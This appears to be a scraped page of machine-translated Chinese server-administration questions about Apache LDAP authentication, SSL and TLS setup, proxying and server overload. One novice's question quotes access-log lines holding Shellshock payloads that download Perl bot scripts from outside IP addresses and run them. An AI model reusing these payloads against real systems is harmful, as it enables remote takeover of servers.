我们使用Apache mod_authnz_ldap来使用我们的LDAP Active Directory向Nagiosauthentication用户。 现在正在使用SamAccountName。 但是,Nagios正在使用SamAccountName作为login用户的名称。这对Author评论等造成了一个小问题(我们没有记住用户ID)。 有没有办法使用SamAccountName mod_authnz_ldap进行身份validation,但返回显示名称或名称? 这样作者评论会显示用户的真实姓名。 这里是我的httpd的nagios.conf: <Directory "/usr/lib64/nagios/cgi-bin/"> # SSLRequireSSL Options ExecCGI Options FollowSymLinks AllowOverride None AuthBasicProvider ldap AuthType Basic AuthzLDAPAuthoritative off AuthName "Active Directory Login" AuthLDAPURL "ldap://my.ldap.server:389/dc=my_dc,dc=my_dc,dc=net?sAMAccountName?sub" NONE Require valid-user </Directory> Alias /nagios "/usr/share/nagios/html" <Directory "/usr/share/nagios/html"> # SSLRequireSSL Options ExecCGI Options FollowSymLinks AllowOverride None AuthBasicProvider ldap AuthType Basic AuthzLDAPAuthoritative off […]
经过了一整天的调查,为什么我不能让我的应用程序通过SSL使用PHP PDO连接到远程服务器,我发现PDO :: MYSQL_ATTR_SSL …,但它似乎只存在于5.3.7或更高。 我的问题是这个。 SSL支持仅适用于PHP 5.3.7及以上版本吗? 还是我的结论不正确?
我通过我们的Apache服务器的ssl.conf文件中的“SSLProtocol All -SSLv2 -SSLv3”应用了Apache的POODLE修复程序,但是在通过“SSLVerifyClient require”进行CAC客户端身份validation时遇到问题。 我已经确认,如果我设置“SSLVerifyClient none”我们的Web应用程序可以通过HTTPS访问,并使用正确的TLSv1协议,但是一旦我设置“SSLVerifyClient require”(因为我们的Web应用程序启用了CAC,在IE中显示(IE禁用了SSLv2和SSLv3,但启用了TLS1.0-3)。 客户端是IE 8的Windows 7 32位。服务器是Windows 2003 SP2。 我已经做了客户端和服务器之间的数据包捕获。 第一个客户问候是TLSv1.2然后发送致命错误closures通知。 因为我的服务器不支持TLSv1.1或TLSv1.2,所以客户端Hello是为TLSv1发送的。 该过程一直到客户端证书申请服务器你好完成然后另一个致命错误closures通知是由客户端发送.. 屏幕盖在这里: http : //i.imgur.com/y3GvjlP.jpg 这里是完整的TCPstream: 第一个stream客户端hello发送并尝试协商TLSv1.2服务器拒绝,因为它不支持并发送一个closures通知。 第二个stream通过TLSv1.0发送一个客户端hello发送等。但这是从一个单一的连接到web服务器.. 第一stream:i.imgur.com/pmiXn9t.jpg第二stream:i.imgur.com/NIh1lsZ.jpg 连接是在TLSv1,我已经从https://www.ssllabs.com/ssltest/validation。 服务器甚至同意使用TLS密码。 即使通过“chrome.exe –ssl-version-min = tls1”禁用了SSLv2和SSLv3,Chrome也能正常工作 另外这个版本的Apache使用mod_ossl“mod_ossl模块为Oracle HTTP Server提供了强大的encryptionfunction,这个Oracle模块是Oracle HTTP Server的一个插件,它使服务器能够使用SSL,与OpenSSL模块mod_ssl非常相似。 mod_ossl模块基于Oracle的SSL实现,它支持SSL版本3和TLS版本1,并基于Certicom和RSA Security技术。 我不知道如何升级这个以支持TLS v1.1和TLS v1.2,因为我在Oracle上发布了最新的OHS 11g版本,这是由Oracle制作的一个自定义模块。 更新: 我已经在OHS Apache日志上启用了debugging日志级别。 使用IE尝试访问Web应用程序时,我现在收到以下错误: [Mon Nov 10 08:16:05 2014] [error] [client XXXX] […]
嗨我想更新我的SSL证书和Apache拒绝启动时,我将path更改为新的证书文件。 我在CentOS 6.6上运行Apache 2.2。 当我尝试启动Apache时,它位于/ var / log / httpd / ssl_error_log中: [Sun Dec 07 20:00:29 2014] [warn] RSA server certificate is a CA certificate (BasicConstraints: CA == TRUE !?) [Sun Dec 07 20:00:29 2014] [warn] RSA server certificate CommonName (CN) `proposify' does NOT match server name!? 这是* .domain.com的通配符证书(与以前相同)。 我究竟做错了什么? 谢谢! [编辑] 我注意到的一件事是在新的私钥有更多的信息在顶部和旧的只是有关键。 我应该删除信息,所以实际的密钥开始—–开始RSA私人密钥—–? —–BEGIN […]
我有一个使用Spring Security进行login的Spring MVC应用程序。 我使用Apache Webserver作为代理和Tomcat。 以下是我的/etc/apache2/sites-enabled/example.com.conf文件: ServerAdmin [email protected] ServerName example.com ServerAlias www.example.com DocumentRoot /var/www/example.com/public_html ProxyPreserveHost On ProxyRequests off ProxyPass /myapp/j_spring_security_check http://XX.YY.ZZ.WW:8080/myapp/j_spring_security_check ProxyPassReverse /myapp/j_spring_security_check http://XX.YY.ZZ.WW:8080/myapp/j_spring_security_check ProxyPass /myapp http://XX.YY.ZZ.WW:8080/myapp ProxyPassReverse /myapp http://XX.YY.ZZ.WW:8080/myapp 我的问题是现在我必须访问我的网站: www.example.com/myapp 在那里我想要访问它 www.example.com 我试着玩,但login没有正常工作。 我应该如何为此设置ProxyPass和ProxyPassReverse?
所以,我有一个有许多子域的域。 比方说example.com , a.example.com , b.example.com , c.example.com等。 我想要从相同的IP地址在同一台服务器上托pipe他们。 我有我的通配符证书和我的基础域authentication, star_example_com.crt和example_com.crt 。 我试图设置我的Apache服务器来支持域和子域的SSL,但似乎无法得到它的工作。 域是好的,但子域不是。 这是我的configuration: NameVirtualHost *:443 # To support SNI, although, apparently, this directive is deprecated SSLStrictSNIVHostCheck off <VirtualHost example.com:443> SSLEngine On SSLCertificateFile /etc/apache2/ssl/example_com.crt SSLCertificateKeyFile /etc/apache2/ssl/example_com.key SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined <Directory /var/www/> Options Indexes FollowSymLinks MultiViews […]
我新手到networking编程,所以我设置了一个Apache2服务器为我的做法。 似乎有人成功地破解我的Apache服务器。 我有我的access.log中注意到以下行: 81.169.174.52 – – [22/Jan/2015:17:24:39 +0200] "GET /cgi-bin/contact.cgi HTTP/1.1" 200 1531 "-" "() { :;};/usr/ bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://202.191.121.230/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://202.191.121.230/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'" 也是这一个: 80.92.84.168 – – [22/Jan/2015:18:21:08 +0200] "GET /phppath/cgi_wrapper HTTP/1.0" 200 3360 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESSX\";system(\"wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm – […]
我正在尝试在我自己的VPS和Cloudflare之间build立一个自签名的SSL证书(在Full SSL旁边)。 我正在使用以下VirtualHosts: <VirtualHost *:80> ServerName domain.com Redirect permanent / https://www.domain.com/ </VirtualHost> <VirtualHost *:443> ServerName www.domain.com DocumentRoot /var/www/public/www SSLEngine on SSLCertificateFile /etc/apache2/ssl/apache.crt SSLCertificateKeyFile /etc/apache2/ssl/apache.key </VirtualHost> 但是,每当我尝试访问domain.com它将返回一个403 Forbidden并在我的apache2日志中得到以下错误: [Fri Jan 30 00:19:23 2015] [error] [client (ip)] Directory index forbidden by Options directive: /var/www/public/ 这意味着它会尝试访问apache2.conf设置的默认DocumentRoot: ServerAdmin [email protected] DocumentRoot /var/www/public 请注意,当我将第二个VirtualHost的端口更改为80并注释关于SSL的3行时,它可以正常工作。 所以我的问题是:为什么不使用我在VirtualHost( *:433 )中指定的DocumentRoot? 编辑 当我暂停Cloudflare并转到https://www.domain.com时,我可以访问它(当然由于证书是自签名的,所以会出现警告)。 所以也许这跟Cloudflare有关系?
我有一个很简单的问题,但我还没有find明确的解释。 虚拟主机conf中*:80和some_ip:80之间的实际区别是什么? 它是否像*:80只在该some_ipconfiguration的接口上监听所有接口和some_ip? 所以几乎如果我只有一个虚拟主机服务器上没有太大的区别?
我遇到了一个问题,我似乎无法弄清楚如何解决它; 我有一个常规的Ubuntu 12.04服务器与Apache 2.2运行一个网站。 时不时的服务器重载,并开始变得没有反应,简单的命令需要很长时间才能执行,直到服务器重新启动或重新启动apache / mysql。 (而网站本身closures完成) 看错误日志,我看到一个简单的 [error] server reached MaxClients setting, consider raising the MaxClients setting 后面跟着一堆mysqli无法连接 人们会简单地假设我需要增加MaxClients,但是我已经做了几次,我担心我会通过将服务器设置得太高来让服务器过载,下面是如何设置mpm prefork: <IfModule mpm_prefork_module> StartServers 20 MinSpareServers 10 MaxSpareServers 20 MaxClients 150 MaxRequestsPerChild 90 </IfModule> 在正常的一天,我们有大约1700个用户/访问者 (在24小时内)。 服务器详情: 内存:3GB CPU:1 – 3300MHz 操作系统:Ubuntu 12.04 Apache:2.2与PHP 5.3.10和MySQL 5.5.41 我看了几幅图片,在这里你可以看到apache在再次下降之前吞下了很多的CPU:(这只是在networking服务器上的一个用户的小轿车(5到20)) 我如何避免我的服务器崩溃/重载? (我打开任何解决scheme,即使更改为nginx或其他的东西,如果这可以更好地处理负载)。 另外,我不关心RAM的使用/消耗,因为我可以添加更多的RAM,这是我关心的CPU。